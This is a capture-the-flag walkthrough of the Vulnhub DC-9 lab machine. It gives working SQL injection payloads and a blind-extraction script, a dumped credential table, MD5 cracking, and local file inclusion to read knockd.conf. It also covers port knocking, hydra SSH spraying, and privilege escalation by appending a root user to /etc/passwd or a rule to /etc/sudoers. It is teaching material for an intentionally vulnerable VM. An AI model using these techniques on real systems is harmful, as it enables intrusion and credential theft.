Vulnhub DC-9

Difficulty: Easy
Virtual Machine Address:
https://www.vulnhub.com/entry/dc-9,412/

Target

root privilege

Access Application

nmap -Pn 10.0.2.4

The application exposes search.php, which lets us search for a record.

display.php shows the records stored by the application.

The search parameter is injectable, so we can use sqlmap to pull out more sensitive information.

sqlmap confirms two injection techniques on the search parameter, boolean-based blind and time-based blind:

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: search (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: search=Moe' AND 4391=4391 AND 'tkRy'='tkRy

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: search=Moe' AND (SELECT 7894 FROM (SELECT(SLEEP(5)))QUdw) AND 'qgGb'='qgGb
---
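The boolean-based blind payload above works because search.php only reveals whether the injected condition was true (a result row or none). The following is an added example, not code from the DC-9 box or from the original writeup: it reproduces that oracle against a constructed in-memory SQLite table holding a few rows from the dump, then recovers a password one character at a time the way sqlmap does, and shows the parameterized query that closes the hole. The string-concatenated query is an assumption about search.php (its source is not on the page), and SQLite's unicode()/substr() stand in for MySQL's ORD()/SUBSTRING().

```python
import sqlite3

# Constructed stand-in for the DC-9 database (SQLite here; the box runs MySQL).
# Rows are copied from the sqlmap dump; a few are enough for the demonstration.
ROWS = [
    (1, "Moe", "3kfs86sfd", "marym"),
    (2, "Dooley", "468sfdfsd2", "julied"),
    (3, "Flintstone", "4sfd87sfd1", "fredf"),
]


def build_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE UserDetails (id INTEGER, lastname TEXT, password TEXT, username TEXT)")
    con.executemany("INSERT INTO UserDetails VALUES (?, ?, ?, ?)", ROWS)
    return con


def vulnerable_search(con, search):
    # Assumed shape of search.php's query: user input concatenated straight into the SQL string.
    # The app only tells us whether any row matched, which is all a boolean-based blind attack needs.
    sql = "SELECT id FROM UserDetails WHERE lastname = '" + search + "'"
    return len(con.execute(sql).fetchall()) > 0


def safe_search(con, search):
    # Fixed version: a bound parameter is never parsed as SQL, so the payload matches no lastname.
    sql = "SELECT id FROM UserDetails WHERE lastname = ?"
    return len(con.execute(sql, (search,)).fetchall()) > 0


def blind_extract(oracle, subquery, max_len=64):
    """Recover the string returned by `subquery` using only true/false answers.

    For each position the character's code point is binary-searched with a payload of the form
        Moe' AND unicode(substr((<subquery>),<pos>,1)) > <mid> AND 'a'='a
    (MySQL equivalent: ORD(SUBSTRING(...))). Past the end of the string substr() returns '',
    the comparison is never true, and the search settles on 0, which ends the loop.
    """
    result = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            payload = f"Moe' AND unicode(substr(({subquery}),{pos},1)) > {mid} AND 'a'='a"
            if oracle(payload):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:  # no character at this position: end of string
            break
        result += chr(lo)
    return result


def demo():
    """Extract fredf's password through the oracle; returns the recovered string."""
    con = build_db()
    # Sanity check with the same style of always-true tail sqlmap reported above.
    assert vulnerable_search(con, "Moe' AND 4391=4391 AND 'tkRy'='tkRy")
    return blind_extract(lambda p: vulnerable_search(con, p),
                         "SELECT password FROM UserDetails WHERE username='fredf'")


if __name__ == "__main__":
    print("fredf password via blind injection:", demo())
```

Each character costs about seven requests, which is why sqlmap prefers the boolean technique over the SLEEP-based one whenever the page content differs between true and false.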
Save the intercepted POST request to a file (here simply named 1) and dump the table:

sqlmap -r 1 -D users -T UserDetails --columns --dump

This gives us the usernames and passwords of the application's users:

+----+------------+---------------+---------------------+-----------+-----------+
| id | lastname   | password      | reg_date            | username  | firstname |
+----+------------+---------------+---------------------+-----------+-----------+
| 1  | Moe        | 3kfs86sfd     | 2019-12-29 16:58:26 | marym     | Mary      |
| 2  | Dooley     | 468sfdfsd2    | 2019-12-29 16:58:26 | julied    | Julie     |
| 3  | Flintstone | 4sfd87sfd1    | 2019-12-29 16:58:26 | fredf     | Fred      |
| 4  | Rubble     | RocksOff      | 2019-12-29 16:58:26 | barneyr   | Barney    |
| 5  | Cat        | TC&TheBoyz    | 2019-12-29 16:58:26 | tomc      | Tom       |
| 6  | Mouse      | B8m#48sd      | 2019-12-29 16:58:26 | jerrym    | Jerry     |
| 7  | Flintstone | Pebbles       | 2019-12-29 16:58:26 | wilmaf    | Wilma     |
| 8  | Rubble     | BamBam01      | 2019-12-29 16:58:26 | bettyr    | Betty     |
| 9  | Bing       | UrAG0D!       | 2019-12-29 16:58:26 | chandlerb | Chandler  |
| 10 | Tribbiani  | Passw0rd      | 2019-12-29 16:58:26 | joeyt     | Joey      |
| 11 | Green      | yN72#dsd      | 2019-12-29 16:58:26 | rachelg   | Rachel    |
| 12 | Geller     | ILoveRachel   | 2019-12-29 16:58:26 | rossg     | Ross      |
| 13 | Geller     | 3248dsds7s    | 2019-12-29 16:58:26 | monicag   | Monica    |
| 14 | Buffay     | smellycats    | 2019-12-29 16:58:26 | phoebeb   | Phoebe    |
| 15 | McScoots   | YR3BVxxxw87   | 2019-12-29 16:58:26 | scoots    | Scooter   |
| 16 | Trump      | Ilovepeepee   | 2019-12-29 16:58:26 | janitor   | Donald    |
| 17 | Morrison   | Hawaii-Five-0 | 2019-12-29 16:58:28 | janitor2  | Scott     |
+----+------------+---------------+---------------------+-----------+-----------+

Dumping further with sqlmap also turns up the website admin account: a username and an MD5 password hash rather than a cleartext password.

Crack the MD5 hash. An unsalted MD5 of a weak password is recovered by lookup or wordlist, not decrypted; an online lookup service such as
https://www.md5online.org/md5-decrypt.html
works here, but on a real engagement prefer an offline check so the hash never leaves your machine.
hash  = 856f5de590ef37314e7c3bdf6f8a66dc
Found: transorbital1
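An offline equivalent of the lookup, added here as an example and not part of the original writeup: check candidates against the hash locally. The candidate list is constructed for the demonstration (a few passwords from the dump plus the recovered value); the wordlist variant takes any one-per-line file such as rockyou.txt.

```python
import hashlib

ADMIN_HASH = "856f5de590ef37314e7c3bdf6f8a66dc"

# Constructed candidate list: some passwords from the UserDetails dump plus the recovered value.
CANDIDATES = ["3kfs86sfd", "RocksOff", "Passw0rd", "ILoveRachel", "transorbital1"]


def crack_md5(target_hex, candidates):
    """Return the first candidate whose unsalted MD5 equals target_hex, or None."""
    target = target_hex.strip().lower()
    if len(target) != 32 or any(c not in "0123456789abcdef" for c in target):
        raise ValueError("expected a 32-hex-digit MD5 value")
    for word in candidates:
        data = word if isinstance(word, bytes) else word.encode()
        if hashlib.md5(data).hexdigest() == target:
            return data.decode("utf-8", "replace")
    return None


def crack_md5_with_wordlist(target_hex, path):
    """Same check driven by a wordlist file, read as bytes so odd encodings do not abort the run."""
    with open(path, "rb") as f:
        return crack_md5(target_hex, (line.rstrip(b"\r\n") for line in f))


if __name__ == "__main__":
    print(crack_md5(ADMIN_HASH, CANDIDATES))
```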

After logging in to the admin account there is an Add Record page, which turns out to be a rabbit hole.

Add Record (Rabbit Hole)

If we input PHP code in any of the blanks (Firstname, Lastname, etc.), then when the web application retrieves that information, including the malicious code, the HTML might execute the PHP, giving us a shell or leaking sensitive information. That was my thought, but it failed.

File does not exist

The hint catches your eye the first time, but how do we use it to expand the attack surface?
The error appears in the footer section and states "File does not exist". That points to a PHP include() driven by a request parameter, which may be exploitable for local file inclusion (LFI).

After looking around, knockd.conf turned out to be present on the system, meaning we can read it through the LFI and use the knock sequence it contains to open SSH.

Visiting IP/manage.php?file=../../../../../../../../etc/knockd.conf returns the content of knockd.conf, and the sequence that opens SSH is 7469,8475,9842.

How do we knock on the SSH door?
Here is an article on port knocking for SSH:
https://www.tecmint.com/port-knocking-to-secure-ssh/
Either of these two commands sends the sequence (one TCP SYN per port, in order; --max-retries 0 stops nmap from probing a port twice):

knock -v 10.0.2.4 7469 8475 9842
for x in 7469 8475 9842; do nmap -Pn --max-retries 0 -p $x 10.0.2.4; done
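As an added example (not from the original writeup or the DC-9 box), the following Python pulls the sequence out of a knockd.conf read through the LFI and replays it. The sample configuration is constructed to match the knockd format and the page's 7469,8475,9842 sequence; its other lines (timeouts, iptables commands, the closeSSH section) are assumptions. knock() does what the two commands above do: a connect() attempt sends one TCP SYN per port, and the port being closed (a RST in reply) is expected.

```python
import re
import socket

# Constructed sample in knockd.conf format. Only the openSSH sequence is taken from the page;
# everything else is an assumption about what such a file typically contains.
SAMPLE_KNOCKD_CONF = """\
[options]
\tUseSyslog

[openSSH]
\tsequence    = 7469,8475,9842
\tseq_timeout = 25
\tcommand     = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
\ttcpflags    = syn

[closeSSH]
\tsequence    = 9842,8475,7469
\tseq_timeout = 25
\tcommand     = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
\ttcpflags    = syn
"""


def parse_sequences(conf_text):
    """Return {section_name: [ports]} for every section that carries a sequence= line.

    knockd allows entries like 7000:tcp; the protocol suffix is dropped here because the
    knocker below only speaks TCP.
    """
    sequences, section = {}, None
    for raw in conf_text.splitlines():
        line = raw.strip()
        m = re.match(r"\[(\w+)\]", line)
        if m:
            section = m.group(1)
            continue
        m = re.match(r"sequence\s*=\s*(.+)", line)
        if m and section:
            sequences[section] = [int(p.strip().split(":")[0]) for p in m.group(1).split(",")]
    return sequences


def knock(host, ports, timeout=0.5):
    """Send one TCP SYN per port, in order, within knockd's seq_timeout window."""
    for port in ports:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(timeout)
        try:
            s.connect((host, port))
        except OSError:
            pass  # closed or filtered port: the SYN was still sent, which is all knockd needs
        finally:
            s.close()


def open_ssh(host, conf_text, section="openSSH"):
    """Parse the config and knock the named section's sequence; returns the ports used."""
    ports = parse_sequences(conf_text)[section]
    knock(host, ports)
    return ports


if __name__ == "__main__":
    print("open sequence:", parse_sequences(SAMPLE_KNOCKD_CONF)["openSSH"])
    # open_ssh("10.0.2.4", SAMPLE_KNOCKD_CONF)  # against the lab box, then connect to port 22
```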

Once the door is open, do we already have users and passwords? Yes: the usernames and passwords came out of the sqlmap dump above.

The dumped password list is not complete, though. After logging in as janitor there is another password file in a hidden directory; add those passwords to password.txt and run hydra again.

Spray the usernames and passwords against SSH with hydra:

hydra -L user.txt -P password.txt ssh://10.0.2.4
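hydra's -L and -P files come straight from the sqlmap table. Added example, not part of the original writeup: parse the dump table exactly as sqlmap printed it above into rows and write user.txt and password.txt, deduplicating passwords so the extra ones from janitor's hidden file can simply be appended before the second hydra run. The table text is embedded from the page; the output file names are the ones the hydra command uses.

```python
# sqlmap's dump table, copied from the page so the script runs offline.
SQLMAP_DUMP = """\
+----+------------+---------------+---------------------+-----------+-----------+
| id | lastname   | password      | reg_date            | username  | firstname |
+----+------------+---------------+---------------------+-----------+-----------+
| 1  | Moe        | 3kfs86sfd     | 2019-12-29 16:58:26 | marym     | Mary      |
| 2  | Dooley     | 468sfdfsd2    | 2019-12-29 16:58:26 | julied    | Julie     |
| 3  | Flintstone | 4sfd87sfd1    | 2019-12-29 16:58:26 | fredf     | Fred      |
| 4  | Rubble     | RocksOff      | 2019-12-29 16:58:26 | barneyr   | Barney    |
| 5  | Cat        | TC&TheBoyz    | 2019-12-29 16:58:26 | tomc      | Tom       |
| 6  | Mouse      | B8m#48sd      | 2019-12-29 16:58:26 | jerrym    | Jerry     |
| 7  | Flintstone | Pebbles       | 2019-12-29 16:58:26 | wilmaf    | Wilma     |
| 8  | Rubble     | BamBam01      | 2019-12-29 16:58:26 | bettyr    | Betty     |
| 9  | Bing       | UrAG0D!       | 2019-12-29 16:58:26 | chandlerb | Chandler  |
| 10 | Tribbiani  | Passw0rd      | 2019-12-29 16:58:26 | joeyt     | Joey      |
| 11 | Green      | yN72#dsd      | 2019-12-29 16:58:26 | rachelg   | Rachel    |
| 12 | Geller     | ILoveRachel   | 2019-12-29 16:58:26 | rossg     | Ross      |
| 13 | Geller     | 3248dsds7s    | 2019-12-29 16:58:26 | monicag   | Monica    |
| 14 | Buffay     | smellycats    | 2019-12-29 16:58:26 | phoebeb   | Phoebe    |
| 15 | McScoots   | YR3BVxxxw87   | 2019-12-29 16:58:26 | scoots    | Scooter   |
| 16 | Trump      | Ilovepeepee   | 2019-12-29 16:58:26 | janitor   | Donald    |
| 17 | Morrison   | Hawaii-Five-0 | 2019-12-29 16:58:28 | janitor2  | Scott     |
+----+------------+---------------+---------------------+-----------+-----------+
"""


def parse_sqlmap_table(text):
    """Turn an ASCII table as printed by sqlmap --dump into a list of dicts keyed by column name.

    Border lines start with '+' and are skipped; the first '|' line is the header.
    Cell values containing a literal '|' are not handled (none occur in this dump).
    """
    header, rows = None, []
    for line in text.splitlines():
        if not line.startswith("|"):
            continue
        cells = [c.strip() for c in line.strip().strip("|").split("|")]
        if header is None:
            header = cells
        else:
            rows.append(dict(zip(header, cells)))
    return rows


def wordlists(rows):
    """Return (usernames, passwords) with duplicates removed, order preserved."""
    users, passwords = [], []
    for r in rows:
        if r["username"] not in users:
            users.append(r["username"])
        if r["password"] not in passwords:
            passwords.append(r["password"])
    return users, passwords


def write_wordlists(rows, user_path="user.txt", pass_path="password.txt"):
    users, passwords = wordlists(rows)
    with open(user_path, "w") as f:
        f.write("\n".join(users) + "\n")
    with open(pass_path, "w") as f:
        f.write("\n".join(passwords) + "\n")
    return len(users), len(passwords)


if __name__ == "__main__":
    n_users, n_pass = write_wordlists(parse_sqlmap_table(SQLMAP_DUMP))
    print(f"wrote {n_users} users and {n_pass} passwords; now: hydra -L user.txt -P password.txt ssh://10.0.2.4")
```

After the janitor login, append the contents of the hidden password file to password.txt and rerun hydra with the same user.txt.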

Get shell

Once logged in as fredf, sudo -l shows the way to escalate privileges.

sudo -l
User fredf may run the following commands on dc-9:
    (root) NOPASSWD: /opt/devstuff/dist/test/test
    (ALL : ALL) ALL

Running /opt/devstuff/dist/test/test without arguments prints its usage:

Usage: python test.py read append

The binary reads the first file and appends its contents to the second, and sudo runs it as root. That is an arbitrary-file-append primitive, so we can append a line to /etc/sudoers or to /etc/passwd.

Option 1: append a sudoers rule for fredf (a plain echo keeps the trailing newline, so the file stays well-formed):

echo 'fredf ALL=(ALL:ALL) ALL' > payload.txt
sudo /opt/devstuff/dist/test/test payload.txt /etc/sudoers

Option 2: append a new uid-0 user to /etc/passwd. Generate an MD5-crypt hash for the password 123456 (openssl truncates the salt to 8 characters, hence l3vi4th4 in the output):

openssl passwd -1 -salt l3vi4th4n 123456
[output] $1$l3vi4th4$IFdDftj0TAc1LLxP5OlsF0

Single quotes are required on the next line: inside double quotes the shell would expand $1, $l3vi4th4 and $IFdDftj0TAc1LLxP5OlsF0 to empty strings and corrupt the entry. The second argument to the binary must be the file that holds this line (payload1.txt), not the sudoers payload.

echo 'l3vi4th4n:$1$l3vi4th4$IFdDftj0TAc1LLxP5OlsF0:0:0:root:/root:/bin/bash' > payload1.txt
sudo /opt/devstuff/dist/test/test payload1.txt /etc/passwd
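To build both payload files without depending on shell quoting, here is an added Python example (not from the writeup or the box). It generates the same MD5-crypt hash as openssl passwd -1, assembles the sudoers and passwd lines, and includes an append_file() helper that mirrors what the page says the test binary does (read the first argument, append to the second) so the result can be inspected on a scratch copy of a passwd file. The md5crypt port is written here from the FreeBSD algorithm and is checked against the openssl output shown above; the minimal passwd content used by demo() is constructed.

```python
import hashlib
import os
import tempfile

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def _to64(value, n):
    """crypt-style base64: n characters, least-significant 6 bits first."""
    out = ""
    for _ in range(n):
        out += ITOA64[value & 0x3F]
        value >>= 6
    return out


def md5crypt(password, salt):
    """MD5-crypt ($1$) as produced by `openssl passwd -1 -salt SALT PASSWORD`.

    Port of the classic FreeBSD algorithm. The salt is truncated to 8 characters, which is
    why openssl turns l3vi4th4n into l3vi4th4 in the output above.
    """
    pw = password.encode()
    salt = salt.encode()[:8]
    magic = b"$1$"
    ctx = hashlib.md5(pw + magic + salt)
    alt = hashlib.md5(pw + salt + pw).digest()
    n = len(pw)
    while n > 0:
        ctx.update(alt[:min(16, n)])
        n -= 16
    n = len(pw)
    while n:
        ctx.update(b"\x00" if n & 1 else pw[:1])
        n >>= 1
    final = ctx.digest()
    for i in range(1000):  # stretching rounds, mixing password/salt/state in a fixed pattern
        c = hashlib.md5()
        c.update(pw if i & 1 else final)
        if i % 3:
            c.update(salt)
        if i % 7:
            c.update(pw)
        c.update(final if i & 1 else pw)
        final = c.digest()
    encoded = ""
    for a, b, cidx in ((0, 6, 12), (1, 7, 13), (2, 8, 14), (3, 9, 15), (4, 10, 5)):
        encoded += _to64((final[a] << 16) | (final[b] << 8) | final[cidx], 4)
    encoded += _to64(final[11], 2)
    return (magic + salt).decode() + "$" + encoded


def sudoers_line(user):
    """Option 1 payload: grant the user full sudo rights (trailing newline included)."""
    return f"{user} ALL=(ALL:ALL) ALL\n"


def passwd_line(user, password, salt):
    """Option 2 payload: uid 0 / gid 0 makes the new account root, and putting the hash
    directly in the password field means no /etc/shadow entry is needed."""
    return f"{user}:{md5crypt(password, salt)}:0:0:root:/root:/bin/bash\n"


def append_file(src, dst):
    """What the page says /opt/devstuff/dist/test/test does: read src, append it to dst."""
    with open(src) as f:
        data = f.read()
    with open(dst, "a") as f:
        f.write(data)


def demo():
    """Run the passwd route against a scratch passwd file; returns the appended line."""
    d = tempfile.mkdtemp()
    payload, target = os.path.join(d, "payload1.txt"), os.path.join(d, "passwd")
    with open(target, "w") as f:
        f.write("root:x:0:0:root:/root:/bin/bash\n")  # constructed minimal passwd file
    with open(payload, "w") as f:
        f.write(passwd_line("l3vi4th4n", "123456", "l3vi4th4n"))
    append_file(payload, target)
    with open(target) as f:
        return f.read().splitlines()[-1]


if __name__ == "__main__":
    print(sudoers_line("fredf"), end="")
    print(demo())
```

On the box the generated line goes into payload1.txt and the real test binary does the append; the new entry is then used with su and the password 123456.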

And we finally get the root flag :-)